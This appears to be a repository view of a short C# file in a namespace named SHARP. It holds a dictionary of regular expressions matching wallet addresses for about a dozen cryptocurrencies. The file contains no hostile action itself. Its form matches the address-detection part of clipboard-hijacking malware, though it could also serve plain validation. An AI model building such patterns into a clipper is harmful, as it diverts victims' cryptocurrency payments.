Files

57 lines
1.3 KiB
C#
Raw Permalink Normal View History

2026-08-27 11:22:57 -06:00
using System.Collections.Generic;
using System.Text.RegularExpressions;
namespace SHARP
{
internal class Patterns
{
public static Dictionary<string, Regex> patterns = new Dictionary<string, Regex>()
{
{
"btc1",
new Regex("(?:^(bc1|[13])[a-zA-HJ-NP-Z0-9]{26,35}$)")
},
{
"btc2",
new Regex("^(bc1|tb1)(p)?[a-z0-9]{26,62}$")
},
{
"usdtTRC20",
new Regex("^T[A-Za-z0-9]{33}$")
},
{
"eth",
new Regex("(?:^0x[a-fA-F0-9]{40}$)")
},
{
"xmr",
new Regex("(?:^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$)")
},
{
"xlm",
new Regex("(?:^G[0-9a-zA-Z]{55}$)")
},
{
"xrp",
new Regex("(?:^r[0-9a-zA-Z]{24,34}$)")
},
{
"ltc",
new Regex("(?:^[LM3][a-km-zA-HJ-NP-Z1-9]{26,33}$)")
},
{
"nec",
new Regex("(?:^A[0-9a-zA-Z]{33}$)")
},
{
"bch",
new Regex("^((bitcoincash:)?(q|p)[a-z0-9]{41})")
},
{
"dash",
new Regex("(?:^X[1-9A-HJ-NP-Za-km-z]{33}$)")
}
};
}
}